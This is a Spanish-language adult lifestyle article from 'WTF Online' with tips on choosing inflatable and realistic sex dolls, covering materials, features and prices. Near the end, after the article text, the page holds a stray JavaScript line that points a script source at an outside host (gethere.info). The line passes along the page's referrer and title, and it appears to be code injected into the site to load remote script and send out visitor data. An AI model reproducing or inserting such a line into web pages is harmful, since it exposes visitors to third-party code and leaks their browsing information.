Tips para elegir una muñeca inflable

Por Elizabeth Palacios @ely__palacios
Uno de los juguetes sexuales más atractivos para los hombres, sin duda, son las muñecas inflables.
El problema llega cuando se deciden a comprar una y ven la cantidad de opciones y, por supuesto, el costo que es bastante elevado.
Es por esto que en WTF Online te decimos algunos tips para que elijas una muñeca inflable dependiendo tus posibilidades.
Las muñecas sexuales más comunes son las inflables, regularmente son de plástico y su apariencia no es precisamente la de una mujer real. Cuentan con un orificio en la vagina y en la boca, para poder simular la penetración de una relación sexual.
Es importante que utilices un lubricante para que no te lastimes el pene mientras estás masturbándote.
Las muñecas inflables tienen un precio accesible, comparadas con las muñecas sexuales más realistas, además de que las puedes conseguir en casi cualquier sex shop.
La opción para aquellos que desean algo mas real, son las muñecas sexuales realistas o relastic blow up, mismas que son elaboradas con vinilo, silicón y una combinación de materiales que ofrecen una textura más agradable.
Además de que la apariencia física de estas muñecas son mucho más realistas simulando la verdadera apariencia de una mujer. Estas muñecas ofrecen:
-Suavidad al tacto simulando la piel real
-Grandes senos
-Orificios vaginales, anales, clítoris y, en muchos casos, en la boca
-Pueden hacerla sobre pedido cumpliendo los requisitos que solicite el comprador
Los precios de estas son mucho más elevados y se recomiendan para las personas que tiene mayor dificultad de relacionarse con personas reales y desean cumplir todas sus fantasías sexuales con lo más cercano a una mujer.

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:||
Comentarios